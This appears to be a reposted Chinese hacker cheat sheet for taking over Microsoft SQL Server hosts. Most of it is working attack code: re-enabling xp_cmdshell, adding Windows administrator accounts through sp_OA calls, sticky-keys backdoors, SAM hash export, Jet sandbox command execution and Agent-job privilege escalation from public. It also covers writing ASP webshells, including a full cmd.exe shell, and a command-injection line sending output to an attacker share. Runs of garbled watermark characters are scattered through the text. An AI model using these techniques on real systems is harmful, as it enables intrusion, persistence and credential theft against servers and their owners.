1. 报错:未能找到存储过程 'master..xp_cmdshell'。
说明 xp_cmdshell 的注册项(master..sysobjects 中 xtype='X' 的记录)被删掉了,用 sp_addextendedproc 重新注册即可;下面三种报错分别处理。若是在注入点上执行,语句前加一个空格和分号(; )再拼接。
恢复方法:查询分析器连接后,
第一步执行: EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
第二步执行(仅 SQL Server 7.0): EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按 F5 执行。
注意:一般 SQL Server 2000 的 xp_cmdshell 由 xplog70.dll 导出,7.0 由 xpsql70.dll 导出,按版本二选一,不要两条都跑(第二条会报"已存在")。重新注册需要 sysadmin 权限。
2. 报错:无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126(找不到指定模块。)
原因 126 表示 DLL 文件本身不在磁盘上(或它依赖的 DLL 缺失),只是删掉再注册同一个 DLL 名不会有效果:要么改注册到实际存在的 DLL(SQL Server 2000 上是 xplog70.dll),要么先把 DLL 上传回去(见下文"上传 xplog70.dll")。
恢复方法:查询分析器连接后,
第一步执行: EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell'
第二步执行: EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'   -- 2000 上改为 'xplog70.dll'
然后按 F5 执行。(过程名用单引号;原文的双引号在 QUOTED_IDENTIFIER ON 时会被当成标识符。)
3. 报错:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
原因 127 表示注册项指向了错误的 DLL:xpweb70.dll 是 Web Assistant(sp_makewebtask)用的库,并不导出 xp_cmdshell。原文第二步又注册回 xpweb70.dll,只会复现同一个错误;应注册到 xplog70.dll。
恢复方法:查询分析器连接后,
第一步执行: exec sp_dropextendedproc 'xp_cmdshell'
第二步执行: exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
然后按 F5 执行。
4. 终极方法
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户。
查询分析器连接后执行。需要 sysadmin;sp_OA* 在 SQL Server 2005 起默认关闭,要先打开 'Ole Automation Procedures'(见文末)。命令是以 SQL Server 服务帐户的身份运行的,服务帐户若不是 LocalSystem 或本地管理员,net user /add 会失败。
Windows 2000 Server 系统(系统目录 c:\winnt):
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
XP 或 2003 Server 系统(系统目录 c:\windows):
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
五个 SHIFT(粘滞键后门)
用 explorer.exe 覆盖 sethc.exe,登录界面连按五次 Shift 启动的就是 explorer 而不是粘滞键程序。Windows 文件保护(WFP)会用 dllcache 里的副本把 sethc.exe 还原回去,所以 dllcache 中的副本也要覆盖;两条按顺序执行:
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
CopyFile 的第三个参数(overwrite)没给,FSO 默认为 True,会覆盖已有文件。
xp_cmdshell 执行命令的另一种方法(把过程名拆开拼接,可以绕过只按关键字 xp_cmdshell 做匹配的过滤):
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
判断扩展存储过程是否存在:
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回 1 说明注册项还在;但这只表示 sysobjects 里有记录,DLL 是否还在磁盘上、能否装载,要实际执行一次才知道(见上面的错误 126/127)。
" {" _2 S- ?" p, C5 d4 |上传xplog70.dll恢复xp_cmdshell语句:7 _& `" N7 c7 A Q
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'0 V! v2 |' e! m& X
3 ~: i( D5 ~, i- C4 h4 ~
否则上传xplog7.0.dll
3 B5 O: Y; r5 x9 T4 h7 M0 u% F7 k" p! fExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'/ d5 }/ v' S7 T% y
' H# g8 K m" ], e; I6 ~1 A1 l
3 M, F, f, H$ Z; K% ~. J4 D
Jet 沙盒(SandBox)模式执行命令
首先开启沙盒模式(改注册表用 xp_regwrite,需要 sysadmin;SandBoxMode=1 表示非 Access 程序不受沙盒限制,可以在查询里求值 shell() 之类的表达式):
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用 jet.oledb 打开任意一个能读到的 .mdb,在查询里调用 VBA 的 shell() 执行系统命令:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
注意:2000 系统路径是 c:\winnt\...,XP/2003 是 c:\windows\...;ias.mdb 只是系统自带的一个 .mdb,换成任何存在的 .mdb 都行。命令以 SQL Server 服务帐户身份运行;Jet 4.0 提供程序只有 32 位版本,64 位 SQL Server 上用不了;SQL Server 2005 起还要先打开 'Ad Hoc Distributed Queries'(见文末)。
实例:返回"不能找到 c:\windows\system32\ias\ias.mdb"错误,用 exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 查看,发现 ias.mdb 没了,应该是被管理员删掉了,另一个 mdb 也没了。
恢复 sp_addextendedproc 本身(管理员连它也删掉的情况):SQL Server 2000 中该系统过程的原文如下,在 master 库里以 sysadmin 身份原样重建即可:
-- Source text of the SQL Server 2000 system procedure sp_addextendedproc, reproduced
-- so it can be re-created in master if an administrator dropped it. It is only a
-- guard around DBCC ADDEXTENDEDPROC, which writes the sysobjects entry (xtype 'X')
-- mapping an extended procedure name to the DLL that exports it. Needs sysadmin.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
-- The DBCC below cannot run inside a user transaction: drop implicit transactions,
-- then fail with error 15002 if one is still open.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
-- Registers @functname -> @dllname. The DLL is not validated here; a missing or
-- wrong DLL shows up as error 126/127 when the procedure is first called.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
" C# |0 @5 ^. X& ]4 _' c# p ~! T/ L. f4 G8 x! i; B( O& _
/ d4 Z# E7 j2 L& @9 ? v
. `$ i/ l ]. i6 F6 }" m. T
导出管理员密码哈希(改密码用完再还原,不用克隆帐户)
sa 能不能读 SAM 键取决于 SQL Server 服务帐户:LocalSystem 可以读 HKLM\SAM,普通管理员帐户默认没有权限。000001F4 = RID 500,即内置 Administrator(改过名也是这个 RID;其他帐户要先找到对应的 RID/SID)。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用 administrator 登录。
用完机器后把原来的哈希导回去(原文导出写的是 old.reg、导入写的是 test.reg,文件名必须一致):
reg import c:\old.reg
这样根本不用克隆帐户,只要找到对应的 SID/RID 即可。
恢复所有常用扩展存储过程(按宿主 DLL 分组;需要 sysadmin,在 master 库中执行;Binn 目录下的 DLL 文件必须还在):
-- Re-registers the extended procedures an administrator commonly drops, grouped by
-- the DLL that exports each one (xplog70.dll, xpstar.dll, odsole70.dll under Binn).
-- Run in master as sysadmin; the DLL files themselves must still be present.
use master
-- xplog70.dll: login/group helpers (the same DLL that hosts xp_cmdshell)
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
-- xpstar.dll: file-system, media and registry helpers
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
-- odsole70.dll: OLE Automation procedures (sp_OACreate and friends)
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
建立读文件的存储过程(靠 BULK INSERT 实现,需要 bulkadmin 或 sysadmin;文件由 SQL Server 服务帐户打开,受其 NTFS 权限限制):
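-- Reads a text file line by line through BULK INSERT and returns the lines as a
-- result set. BULK INSERT needs bulkadmin or sysadmin, and the file is opened by
-- the SQL Server service account, so that account's NTFS permissions apply.
-- @filename: path of the file to read, as seen from the server.
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
-- Build the BULK INSERT with quotename(..., '''') so the path becomes a properly
-- escaped single-quoted literal. The original concatenated it inside double
-- quotes, which breaks on a path containing a quote and lets a caller inject
-- arbitrary T-SQL through @filename.
-- NOTE(review): BULK INSERT splits fields on TAB by default; a line containing a
-- tab has more fields than #tempfile has columns and the load fails. Add a
-- WITH (FIELDTERMINATOR = ...) clause if the target files contain tabs.
exec ('bulk insert #tempfile from ' + quotename(@filename, ''''))
-- The temp table created above is visible to the child batch run by exec().
select * from #tempfile
drop table #tempfile
End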
利用上面建立的存储过程读文件:
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp'
查看登录用户(SQL Server 2000 的 master..sysxlogins 里带密码哈希,只有 sysadmin 能看全;2005 起改为 sys.sql_logins):
Select * from master..sysxlogins
把文件内容读取到表中(路径是字符串,要用单引号;双引号在 QUOTED_IDENTIFIER ON 时会被当成标识符):
BULK INSERT tmp from 'c:\test.txt'
delete from 表名     -- 清理表里的内容
create table b_test(fn nvarchar(4000));   -- 建一个表,字段为 fn
加一个 sysadmin 级别的登录(建登录需要 securityadmin,加入 sysadmin 角色需要 sysadmin):
exec master.dbo.sp_addlogin 'user','pass';
exec master.dbo.sp_addsrvrolemember 'user','sysadmin';
注意 sp_addlogin 在 SQL Server 2005 起已标记为弃用,新版本用 CREATE LOGIN / ALTER SERVER ROLE ... ADD MEMBER;新增登录在 sysxlogins(新版本 sys.server_principals)和 SQL 错误日志中都有痕迹。
用 FileSystemObject 逐行读文件(依赖 sp_OA*,需要 sysadmin;文件同样以 SQL Server 服务帐户身份打开):
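-- Reads a text file line by line through Scripting.FileSystemObject and prints
-- each line. Needs the sp_OA* procedures (sysadmin; on 2005+ enable
-- 'Ole Automation Procedures' first). The file is opened by the SQL Server
-- service account.
declare @o int, @f int, @ret int, @eof int
declare @line varchar(8000)
exec @ret = sp_oacreate 'scripting.filesystemobject', @o out
if @ret <> 0 begin print 'sp_oacreate failed' return end
-- OpenTextFile(path, 1): 1 = ForReading. Replace '文件名' with the target path.
exec @ret = sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
if @ret <> 0 begin print 'opentextfile failed' exec sp_oadestroy @o return end
-- The original looped until ReadLine itself returned an error at end of file;
-- checking AtEndOfStream first avoids that error and handles an empty file.
exec sp_oagetproperty @f, 'AtEndOfStream', @eof out
while( @eof = 0 )
begin
exec @ret = sp_oamethod @f, 'readline', @line out
if @ret <> 0 break
print @line
exec sp_oagetproperty @f, 'AtEndOfStream', @eof out
end
-- Release the COM objects; the original leaked both.
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o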
用 FileSystemObject 写文件(这里的目标是 Serv-U 的配置文件 ServUDaemon.ini,目的是往里加一个 FTP 帐户;CreateTextFile 会整个覆盖原文件,写之前先用上面的读文件方法把原内容读出来备份):
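-- Writes one line into a file through Scripting.FileSystemObject. Needs the
-- sp_OA* procedures (sysadmin); the file is written by the SQL Server service
-- account. The target below is Serv-U's configuration file and CreateTextFile
-- replaces the whole file - read and back it up first.
declare @o int, @f int, @ret int
exec @ret = sp_oacreate 'scripting.filesystemobject', @o out
if @ret <> 0 begin print 'sp_oacreate failed' return end
-- CreateTextFile(path, 1): 1 = overwrite an existing file.
exec @ret = sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
if @ret <> 0 begin print 'createtextfile failed' exec sp_oadestroy @o return end
-- Replace 《内容》 with the line to write (it must be a single-quoted literal).
exec @ret = sp_oamethod @f, 'writeline', NULL, '《内容》'
-- Close flushes the stream. The original never closed or released either
-- object, so the data may not have been flushed until the objects were torn down.
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o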
1 y" S9 e# W5 Z% r# k" A5 s& K# U
3 l% b7 |+ ]1 I. Y: P/ {* @6 N) }9 I; i8 \4 |: ]4 d: H7 A; b
添加lake2 shell% q; Z9 }: U0 G' @# Q
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
0 `% A. @+ o, k1 _$ `sp_dropextendedproc xp_lake2. c6 u1 y1 e& c' s
EXEC xp_lake2 'net user'
/ }- D2 P7 \ i0 D5 a
7 t1 K/ U X- J7 R& M* y9 `- G6 Z# p
得到硬盘目录/文件信息(xp_dirtree 默认对 public 开放执行,是注入时常用的目录探测手段;也可以传 UNC 路径 \\host\share 让服务器向外发起 SMB 连接)
--参数说明:目录名,目录深度(0 表示不限),是否显示文件(1 显示)
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
读 Serv-U 配置信息(依赖上面建立的 sp_readTextFile;ServUDaemon.ini 里一般有 FTP 帐户、密码哈希和本地管理端口,拿到后可配合 Serv-U 本地提权):
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
通过 xp_regwrite 写 SHIFT 后门(映像劫持:给 sethc.exe 设 Debugger,登录界面按五次 Shift 时启动的就是 cmd.exe;需要 sysadmin,且服务帐户要能写 HKLM)
原文的值 'c:\windows\system32\cmd.exe on' 多了一个 " on",类型应写成 REG_SZ;Debugger 的值就是要启动的程序路径:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger','REG_SZ','c:\windows\system32\cmd.exe';--
这种方式不改文件,不会被 WFP 还原,但 IFEO 键是常见的检测点。
找到 web 路径(可用 exec master.dbo.xp_subdirs 'd:\web\www.xx.com'; 列子目录确认),然后用 sp_makewebtask 把查询结果"备份"成一个 asp 小马:
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select ''<%execute(request("SB"))%>'''
通用形式:
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp', @query = 'SELECT 你的字段 FROM 你建的临时表'
说明:sp_makewebtask 生成的是一个 HTML 页面,查询结果嵌在表格里,但其中的 <% %> 仍会被 ASP 解析,所以能当 webshell 用;文件由 SQL Server 服务帐户写入,web 目录要对它可写。sp_makewebtask 在 SQL Server 2005 中已标记为弃用,2008 起移除。
SQL Server 2005 下开启 xp_cmdshell 的办法(以下 sp_configure 都需要 ALTER SETTINGS 权限,即 sysadmin/serveradmin;每次改动都会写入 SQL 错误日志,防守方在 sys.configurations 和日志里都能看到):
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
SQL Server 2005 开启 'OPENROWSET' 支持的方法(即允许 Ad Hoc 分布式查询,上面的 Jet 沙盒方法也依赖它):
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
SQL Server 2005 开启 'sp_oacreate' 支持的方法(所有 sp_OA* 都由这个开关控制):
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
+ f" I; v9 K5 T# L! w& V
& J! W1 h E: I# y0 [3 A4 A4 X9 m8 e) a
. c2 N/ @1 z) v$ _1 ?
% Q; o+ r# l \$ V' g" u# g8 [
/ Z3 `" V( }2 r
x$ p8 N- G, k& r, G
5 l7 k8 L6 _0 U0 L \
/ U2 o8 X. a* Q& o
+ s3 z$ }' }0 |" E
9 n2 h& y& P3 ~$ {5 C
) R* t! _- [; l2 G' l( V1 @
. K. H0 o; W# f" h' F2 F' Q1 _7 g* {2 w
9 _0 ?0 U& g- q+ j5 S" I! f+ {
* E0 O* s# X* A, |' [+ K4 Q- h
& \4 @9 [8 ]9 ^
2 y4 k7 e3 V" }3 b& {" j6 c+ k3 ^$ L, [9 U% a
5 X: \* @- D2 N2 F, W# L5 e
3 n# V9 v. t. V7 V/ i' w) N/ K1 @) o; [4 I* W: h i" v/ V
, n, [+ E! U: P6 ^: u2 D# w
% h' i0 i2 H2 w# Z7 V- B q, X
# x! Z$ T1 T `* t3 n
以下几种方法原作者未逐一验证,留作研究。它们都依赖 SQL Server Agent;原文的字符串引号在转载时丢失,下面已补回。
4) 用 SQL Agent 作业执行系统命令
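-- Runs an OS command through a SQL Server Agent job with a CMDEXEC step.
-- The job procedures live in msdb, not master. The Agent service must be running
-- (net start SQLSERVERAGENT), and the command executes under the Agent service
-- account (jobs owned by non-sysadmin logins use the Agent proxy account, if one
-- is configured), not under the caller's login.
-- String delimiters were lost when this was copied; restored below.
use msdb;
exec sp_add_job @job_name = 'czy82';
exec sp_add_jobstep @job_name = 'czy82', @step_name = 'Exec my sql', @subsystem = 'CMDEXEC', @command = 'dir c:\ > c:\b.txt';
-- '(local)' is sp_add_jobserver's default and targets this instance; the original
-- used a placeholder host name (@@SERVERNAME also works).
exec sp_add_jobserver @job_name = 'czy82', @server_name = '(local)';
exec sp_start_job @job_name = 'czy82';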
" f$ z2 F# Q7 q# n7 g# I9 _+ G
+ f+ E5 r: m4 G) b1 O利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以7 `. f4 K( S( Q
执行tsql语句了.
3 c1 x' k$ @0 l. t% P对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
4 O5 x3 [2 Q! g9 y: b4 k/ q6 o第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
' G( E2 Q& W; pnet start SQLSERVERAGENT1 B# C7 p5 u- n) i& @; a
2 A Z9 |# }* H( @$ [3 x对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
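-- Privilege escalation on unpatched SQL Server 2000: the TSQL job step is run by
-- the Agent rather than by the submitting login, and xp_execresultset executes
-- the text returned by the inner SELECT, so xp_cmdshell is reached from a login
-- that may only be public. @delete_level = 1 removes the job once it succeeds.
-- String delimiters were lost in copying; restored below with nested quotes
-- doubled at each level.
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
-- What the step executes, after unquoting:
--   exec master..xp_execresultset N'select ''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"''', N'Master'
@command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''', N''Master'''
-- '(local)' targets this instance; the original left a placeholder for the server name.
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '(local)'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'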
. S0 W% s& i$ `( C9 ~0 {不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
! D" M$ Z0 I& D, g f9 h0 m才让我们可以以public执行xp_cmdshell6 p; `) }# i/ `3 o" M& p
" |/ A8 |, d$ d% D5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
; n1 n) c, L6 I6 k$ S9 a, V" _, n0 J在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968# j( a) e3 e. e& g
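-- Arbitrary file create/overwrite through SQL Server Agent: a job step's
-- @output_file_name is written by the Agent service account, so a login that can
-- create jobs (public on unpatched SQL Server 2000, per the advisory linked above)
-- can create or clobber any file that account can write. @delete_level = 1
-- removes the job after it succeeds. String delimiters were lost in copying and
-- are restored below.
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFilecreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFilecreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
-- '(local)' targets this instance; the original left SERVER_NAME as a placeholder.
EXEC sp_add_jobserver @job_name = 'ArbitraryFilecreate',
@server_name = '(local)'
EXEC sp_start_job @job_name = 'ArbitraryFilecreate'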
如果 subsystem 选的是 TSQL,生成的文件头部会带上 Agent 的输出头(原文此处编码已损坏,按 Agent 输出文件的格式大致应为):
Job 'ArbitraryFilecreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 rows(s) affected)
所以要生成"干净"的文件最好 subsystem 选 CMDEXEC(例如用 echo 重定向);如果利用得好,可以写一个带添加管理员命令的 vbs 文件到启动目录。
6) 关于 sp_makewebtask(可以写任意内容、任意文件名的文件,见上面的 webshell 例子)
关于 sp_MScopyscriptfile(复制用的复制脚本文件的过程):从下面 payload 的形状看,它把文件名拼进一条带双引号的命令行交给 shell 执行,所以文件名里的 " 和 | 可以注入任意命令,命令以 SQL Server 服务帐户身份执行。看下面的例子(引号已补回):
6 O# z& s6 S2 k6 A& _declare @command varchar(100) ; p6 f, [) U1 Q" z* r1 M
declare @scripfile varchar(200)
/ W; J& e9 O, A! ^. K! q' o' |# ~' ?set concat_null_yields_null off ; M, g. \' }1 @8 n
select @command= dir c:\ > "\\attackerip\share\dir.txt"
4 q' ]& S+ m2 ? O' ?select @scripfile= c:\autoexec.bat > nul" | @command | rd "
' J; f: I1 O8 I" i q |( Zexec sp_MScopyscriptfile @scripfile , - E& K$ L; b1 X( `# Q% H$ E
这两个都还在测试中。
让 MSSQL 的 public 用户得到一个本机 web shell(原文称 SQL Server 2000 早期补丁级别上 public 即可执行 sp_makewebtask;生成的文件由 SQL Server 服务帐户写入,web 目录须对其可写):
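-- Drops an ASP command shell into the web root through sp_makewebtask: the
-- query's single result row is the ASP page, which sp_makewebtask writes to
-- @outputfile as the SQL Server service account. String delimiters were lost in
-- copying and are restored; inside @query every single quote is doubled. Two
-- characters were also dropped from the ASP ("POST", "<PRE>") and are fixed.
-- The page takes a command from the ".CMD" form field, runs it with cmd.exe,
-- captures the output in a temp file under C:\, echoes it back and deletes it.
sp_makewebtask @outputfile = 'd:\sms\a.asp', @charset = 'gb2312',
--@query = 'select ''<img src=vbscript:msgbox(now())>'''
--@query = 'select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>'''
@query = 'select ''
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>'''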
|